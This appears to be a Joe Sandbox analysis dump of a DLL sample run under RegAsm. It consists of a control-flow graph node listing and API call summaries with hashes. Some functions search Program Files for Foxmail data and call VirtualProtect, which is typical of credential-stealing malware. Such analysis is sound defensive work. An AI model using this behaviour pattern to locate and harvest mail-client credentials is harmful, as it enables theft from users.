10005e85 5990->5991 5992 10005ea0 TlsSetValue 5991->5992 5993 10005e94 5991->5993 5992->5993 5994 10002ada _ValidateLocalCookies 5 API calls 5993->5994 5995 10005b41 5994->5995 5995->5916 5995->5922 6047 10005914 5996->6047 6195 10007613 6001->6195 6004 100055b8 6006 100055c2 IsProcessorFeaturePresent 6004->6006 6007 100055e0 6004->6007 6009 100055cd 6006->6009 6231 10004bc1 6007->6231 6225 100060e2 6009->6225 6014 10005c71 6012->6014 6015 10005c75 __crt_fast_encode_pointer 6012->6015 6014->6015 6023 10005ce1 6014->6023 6015->5977 6017 10002ae3 6016->6017 6018 10002ae5 IsProcessorFeaturePresent 6016->6018 6017->5980 6020 10002b58 6018->6020 6030 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6020->6030 6022 10002c3b 6022->5980 6024 10005d02 LoadLibraryExW 6023->6024 6029 10005cf7 6023->6029 6025 10005d1f GetLastError 6024->6025 6028 10005d37 6024->6028 6026 10005d2a LoadLibraryExW 6025->6026 6025->6028 6026->6028 6027 10005d4e FreeLibrary 6027->6029 6028->6027 6028->6029 6029->6014 6030->6022 6036 10004793 6031->6036 6033 10002ada _ValidateLocalCookies 5 API calls 6034 1000478f 6033->6034 6034->5987 6035 10004765 6035->6033 6037 1000479f ___DestructExceptionObject 6036->6037 6042 10005671 RtlEnterCriticalSection 6037->6042 6039 100047aa 6043 100047dc 6039->6043 6041 100047d1 _abort 6041->6035 6042->6039 6046 100056b9 RtlLeaveCriticalSection 6043->6046 6045 100047e3 6045->6041 6046->6045 6053 10005854 6047->6053 6049 10005938 6050 100058c4 6049->6050 6064 10005758 6050->6064 6052 100058e8 6052->5928 6054 10005860 ___DestructExceptionObject 6053->6054 6059 10005671 RtlEnterCriticalSection 6054->6059 6056 1000586a 6060 10005890 6056->6060 6058 10005888 _abort 6058->6049 6059->6056 6063 100056b9 RtlLeaveCriticalSection 6060->6063 6062 1000589a 6062->6058 6063->6062 6065 10005764 ___DestructExceptionObject 6064->6065 6072 10005671 RtlEnterCriticalSection 6065->6072 6067 1000576e 6073 10005a7f 6067->6073 6069 10005786 
6077 1000579c 6069->6077 6071 10005794 _abort 6071->6052 6072->6067 6074 10005ab5 __fassign 6073->6074 6075 10005a8e __fassign 6073->6075 6074->6069 6075->6074 6080 10007cc2 6075->6080 6194 100056b9 RtlLeaveCriticalSection 6077->6194 6079 100057a6 6079->6071 6081 10007d42 6080->6081 6085 10007cd8 6080->6085 6082 10007d90 6081->6082 6084 1000571e _free 19 API calls 6081->6084 6148 10007e35 6082->6148 6086 10007d64 6084->6086 6085->6081 6087 10007d0b 6085->6087 6092 1000571e _free 19 API calls 6085->6092 6088 1000571e _free 19 API calls 6086->6088 6089 10007d2d 6087->6089 6094 1000571e _free 19 API calls 6087->6094 6090 10007d77 6088->6090 6091 1000571e _free 19 API calls 6089->6091 6093 1000571e _free 19 API calls 6090->6093 6095 10007d37 6091->6095 6097 10007d00 6092->6097 6100 10007d85 6093->6100 6101 10007d22 6094->6101 6102 1000571e _free 19 API calls 6095->6102 6096 10007dfe 6103 1000571e _free 19 API calls 6096->6103 6108 100090ba 6097->6108 6098 10007d9e 6098->6096 6106 1000571e 19 API calls _free 6098->6106 6104 1000571e _free 19 API calls 6100->6104 6136 100091b8 6101->6136 6102->6081 6107 10007e04 6103->6107 6104->6082 6106->6098 6107->6074 6109 100090cb 6108->6109 6135 100091b4 6108->6135 6110 100090dc 6109->6110 6112 1000571e _free 19 API calls 6109->6112 6111 100090ee 6110->6111 6113 1000571e _free 19 API calls 6110->6113 6114 10009100 6111->6114 6115 1000571e _free 19 API calls 6111->6115 6112->6110 6113->6111 6116 10009112 6114->6116 6117 1000571e _free 19 API calls 6114->6117 6115->6114 6118 10009124 6116->6118 6120 1000571e _free 19 API calls 6116->6120 6117->6116 6119 10009136 6118->6119 6121 1000571e _free 19 API calls 6118->6121 6122 10009148 6119->6122 6123 1000571e _free 19 API calls 6119->6123 6120->6118 6121->6119 6124 1000571e _free 19 API calls 6122->6124 6127 1000915a 6122->6127 6123->6122 6124->6127 6125 1000916c 6126 1000917e 6125->6126 6129 1000571e _free 19 API calls 6125->6129 6130 10009190 6126->6130 6131 1000571e _free 19 API calls 
6126->6131 6127->6125 6128 1000571e _free 19 API calls 6127->6128 6128->6125 6129->6126 6132 100091a2 6130->6132 6133 1000571e _free 19 API calls 6130->6133 6131->6130 6134 1000571e _free 19 API calls 6132->6134 6132->6135 6133->6132 6134->6135 6135->6087 6137 100091c5 6136->6137 6138 1000921d 6136->6138 6139 100091d5 6137->6139 6140 1000571e _free 19 API calls 6137->6140 6138->6089 6141 100091e7 6139->6141 6142 1000571e _free 19 API calls 6139->6142 6140->6139 6143 100091f9 6141->6143 6144 1000571e _free 19 API calls 6141->6144 6142->6141 6145 1000920b 6143->6145 6146 1000571e _free 19 API calls 6143->6146 6144->6143 6145->6138 6147 1000571e _free 19 API calls 6145->6147 6146->6145 6147->6138 6149 10007e42 6148->6149 6153 10007e60 6148->6153 6149->6153 6154 1000925d 6149->6154 6152 1000571e _free 19 API calls 6152->6153 6153->6098 6155 10007e5a 6154->6155 6156 1000926e 6154->6156 6155->6152 6190 10009221 6156->6190 6159 10009221 __fassign 19 API calls 6160 10009281 6159->6160 6161 10009221 __fassign 19 API calls 6160->6161 6162 1000928c 6161->6162 6163 10009221 __fassign 19 API calls 6162->6163 6164 10009297 6163->6164 6165 10009221 __fassign 19 API calls 6164->6165 6166 100092a5 6165->6166 6167 1000571e _free 19 API calls 6166->6167 6168 100092b0 6167->6168 6169 1000571e _free 19 API calls 6168->6169 6170 100092bb 6169->6170 6171 1000571e _free 19 API calls 6170->6171 6172 100092c6 6171->6172 6173 10009221 __fassign 19 API calls 6172->6173 6174 100092d4 6173->6174 6175 10009221 __fassign 19 API calls 6174->6175 6176 100092e2 6175->6176 6177 10009221 __fassign 19 API calls 6176->6177 6178 100092f3 6177->6178 6179 10009221 __fassign 19 API calls 6178->6179 6180 10009301 6179->6180 6181 10009221 __fassign 19 API calls 6180->6181 6182 1000930f 6181->6182 6183 1000571e _free 19 API calls 6182->6183 6184 1000931a 6183->6184 6185 1000571e _free 19 API calls 6184->6185 6186 10009325 6185->6186 6187 1000571e _free 19 API calls 6186->6187 6188 10009330 6187->6188 6189 
1000571e _free 19 API calls 6188->6189 6189->6155 6191 10009258 6190->6191 6192 10009248 6190->6192 6191->6159 6192->6191 6193 1000571e _free 19 API calls 6192->6193 6193->6192 6194->6079 6234 10007581 6195->6234 6198 1000766e 6199 1000767a _abort 6198->6199 6201 100076a7 _abort 6199->6201 6205 100076a1 _abort 6199->6205 6248 10005b7a GetLastError 6199->6248 6211 1000771f 6201->6211 6270 10005671 RtlEnterCriticalSection 6201->6270 6202 100076f3 6203 10006368 _free 19 API calls 6202->6203 6206 100076f8 6203->6206 6204 100076d6 6279 1000bdc9 6204->6279 6205->6201 6205->6202 6205->6204 6267 100062ac 6206->6267 6212 1000777e 6211->6212 6214 10007776 6211->6214 6222 100077a9 6211->6222 6271 100056b9 RtlLeaveCriticalSection 6211->6271 6212->6222 6272 10007665 6212->6272 6217 10004bc1 _abort 26 API calls 6214->6217 6217->6212 6219 10005af6 _abort 36 API calls 6223 1000780c 6219->6223 6221 10007665 _abort 36 API calls 6221->6222 6275 1000782e 6222->6275 6223->6204 6224 10005af6 _abort 36 API calls 6223->6224 6224->6204 6226 100060fe ___scrt_fastfail 6225->6226 6227 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6226->6227 6229 100061fb ___scrt_fastfail 6227->6229 6228 10002ada _ValidateLocalCookies 5 API calls 6230 10006219 6228->6230 6229->6228 6230->6007 6298 1000499b 6231->6298 6237 10007527 6234->6237 6236 100055ad 6236->6004 6236->6198 6238 10007533 ___DestructExceptionObject 6237->6238 6243 10005671 RtlEnterCriticalSection 6238->6243 6240 10007541 6244 10007575 6240->6244 6242 10007568 _abort 6242->6236 6243->6240 6247 100056b9 RtlLeaveCriticalSection 6244->6247 6246 1000757f 6246->6242 6247->6246 6249 10005b93 6248->6249 6252 10005b99 6248->6252 6250 10005e08 _abort 10 API calls 6249->6250 6250->6252 6251 1000637b _abort 16 API calls 6253 10005bab 6251->6253 6252->6251 6254 10005bf0 SetLastError 6252->6254 6255 10005bb3 6253->6255 6256 10005e5e _abort 10 API calls 6253->6256 6257 10005bf9 6254->6257 6259 1000571e _free 16 API calls 
6255->6259 6258 10005bc8 6256->6258 6257->6205 6258->6255 6260 10005bcf 6258->6260 6261 10005bb9 6259->6261 6262 1000593c _abort 16 API calls 6260->6262 6263 10005be7 SetLastError 6261->6263 6264 10005bda 6262->6264 6263->6257 6265 1000571e _free 16 API calls 6264->6265 6266 10005be0 6265->6266 6266->6254 6266->6263 6282 10006231 6267->6282 6269 100062b8 6269->6204 6270->6211 6271->6214 6273 10005af6 _abort 36 API calls 6272->6273 6274 1000766a 6273->6274 6274->6221 6276 10007834 6275->6276 6277 100077fd 6275->6277 6297 100056b9 RtlLeaveCriticalSection 6276->6297 6277->6204 6277->6219 6277->6223 6280 10002ada _ValidateLocalCookies 5 API calls 6279->6280 6281 1000bdd4 6280->6281 6281->6281 6283 10005b7a _free 19 API calls 6282->6283 6284 10006247 6283->6284 6285 100062a6 6284->6285 6288 10006255 6284->6288 6293 100062bc IsProcessorFeaturePresent 6285->6293 6287 100062ab 6289 10006231 ___std_exception_copy 25 API calls 6287->6289 6290 10002ada _ValidateLocalCookies 5 API calls 6288->6290 6291 100062b8 6289->6291 6292 1000627c 6290->6292 6291->6269 6292->6269 6294 100062c7 6293->6294 6295 100060e2 _abort 8 API calls 6294->6295 6296 100062dc GetCurrentProcess TerminateProcess 6295->6296 6296->6287 6297->6277 6299 100049a7 _abort 6298->6299 6300 100049bf 6299->6300 6320 10004af5 GetModuleHandleW 6299->6320 6328 10005671 RtlEnterCriticalSection 6300->6328 6304 10004a65 6336 10004aa5 6304->6336 6308 10004a3c 6309 10004a54 6308->6309 6332 10004669 6308->6332 6316 10004669 _abort 5 API calls 6309->6316 6310 100049c7 6310->6304 6310->6308 6329 1000527a 6310->6329 6311 10004a82 6339 10004ab4 6311->6339 6312 10004aae 6314 1000bdc9 _abort 5 API calls 6312->6314 6318 10004ab3 6314->6318 6316->6304 6321 100049b3 6320->6321 6321->6300 6322 10004b39 GetModuleHandleExW 6321->6322 6327 10004b63 6322->6327 6323 10004b95 6325 10002ada _ValidateLocalCookies 5 API calls 6323->6325 6324 10004b8c FreeLibrary 6324->6323 6326 10004b9f 6325->6326 6326->6300 6327->6323 6327->6324 6328->6310 
6347 10005132 6329->6347 6333 10004698 6332->6333 6334 10002ada _ValidateLocalCookies 5 API calls 6333->6334 6335 100046c1 6334->6335 6335->6309 6369 100056b9 RtlLeaveCriticalSection 6336->6369 6338 10004a7e 6338->6311 6338->6312 6370 10006025 6339->6370 6342 10004ae2 6344 10004b39 _abort 7 API calls 6342->6344 6343 10004ac2 GetPEB 6343->6342 6345 10004ad2 GetCurrentProcess TerminateProcess 6343->6345 6346 10004aea ExitProcess 6344->6346 6345->6342 6350 100050e1 6347->6350 6349 10005156 6349->6308 6351 100050ed ___DestructExceptionObject 6350->6351 6358 10005671 RtlEnterCriticalSection 6351->6358 6353 100050fb 6359 1000515a 6353->6359 6357 10005119 _abort 6357->6349 6358->6353 6362 10005182 6359->6362 6363 1000517a 6359->6363 6360 10002ada _ValidateLocalCookies 5 API calls 6361 10005108 6360->6361 6365 10005126 6361->6365 6362->6363 6364 1000571e _free 19 API calls 6362->6364 6363->6360 6364->6363 6368 100056b9 RtlLeaveCriticalSection 6365->6368 6367 10005130 6367->6357 6368->6367 6369->6338 6371 1000604a 6370->6371 6375 10006040 6370->6375 6372 10005c45 _abort 4 API calls 6371->6372 6372->6375 6373 10002ada _ValidateLocalCookies 5 API calls 6374 10004abe 6373->6374 6374->6342 6374->6343 6375->6373 6376->5934 6380 100056b9 RtlLeaveCriticalSection 6377->6380 6379 10006e16 6379->5934 6380->6379 6382 100054c4 6381->6382 6388 100054ba 6381->6388 6383 10005af6 _abort 36 API calls 6382->6383 6382->6388 6384 100054e5 6383->6384 6389 10007a00 6384->6389 6388->5942 6388->5943 6390 10007a13 6389->6390 6392 100054fe 6389->6392 6390->6392 6397 10007f0f 6390->6397 6393 10007a2d 6392->6393 6394 10007a40 6393->6394 6396 10007a55 6393->6396 6395 10006d7e __fassign 36 API calls 6394->6395 6394->6396 6395->6396 6396->6388 6398 10007f1b ___DestructExceptionObject 6397->6398 6399 10005af6 _abort 36 API calls 6398->6399 6400 10007f24 6399->6400 6401 10007f72 _abort 6400->6401 6409 10005671 RtlEnterCriticalSection 6400->6409 6401->6392 6403 10007f42 6410 10007f86 6403->6410 6408 
100055a8 _abort 36 API calls 6408->6401 6409->6403 6411 10007f94 __fassign 6410->6411 6413 10007f56 6410->6413 6412 10007cc2 __fassign 19 API calls 6411->6412 6411->6413 6412->6413 6414 10007f75 6413->6414 6417 100056b9 RtlLeaveCriticalSection 6414->6417 6416 10007f69 6416->6401 6416->6408 6417->6416 6419 10006baf 6418->6419 6423 10006b05 6418->6423 6422 10002ada _ValidateLocalCookies 5 API calls 6419->6422 6425 10006c5b 6422->6425 6428 100086e4 6423->6428 6425->5960 6427 10008a3e 41 API calls 6427->6419 6429 100054a7 __fassign 36 API calls 6428->6429 6430 10008704 MultiByteToWideChar 6429->6430 6432 100087da 6430->6432 6433 10008742 6430->6433 6434 10002ada _ValidateLocalCookies 5 API calls 6432->6434 6436 100056d0 20 API calls 6433->6436 6439 10008763 ___scrt_fastfail 6433->6439 6437 10006b66 6434->6437 6435 100087d4 6447 10008801 6435->6447 6436->6439 6442 10008a3e 6437->6442 6439->6435 6440 100087a8 MultiByteToWideChar 6439->6440 6440->6435 6441 100087c4 GetStringTypeW 6440->6441 6441->6435 6443 100054a7 __fassign 36 API calls 6442->6443 6444 10008a51 6443->6444 6451 10008821 6444->6451 6448 1000880d 6447->6448 6449 1000881e 6447->6449 6448->6449 6450 1000571e _free 19 API calls 6448->6450 6449->6432 6450->6449 6452 1000883c 6451->6452 6453 10008862 MultiByteToWideChar 6452->6453 6454 10008a16 6453->6454 6455 1000888c 6453->6455 6456 10002ada _ValidateLocalCookies 5 API calls 6454->6456 6460 100056d0 20 API calls 6455->6460 6462 100088ad 6455->6462 6457 10006b87 6456->6457 6457->6427 6458 100088f6 MultiByteToWideChar 6459 10008962 6458->6459 6461 1000890f 6458->6461 6464 10008801 __freea 19 API calls 6459->6464 6460->6462 6478 10005f19 6461->6478 6462->6458 6462->6459 6464->6454 6466 10008971 6468 100056d0 20 API calls 6466->6468 6472 10008992 6466->6472 6467 10008939 6467->6459 6469 10005f19 10 API calls 6467->6469 6468->6472 6469->6459 6470 10008a07 6471 10008801 __freea 19 API calls 6470->6471 6471->6459 6472->6470 6473 10005f19 10 API calls 6472->6473 6474 

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                      • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2905821283-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
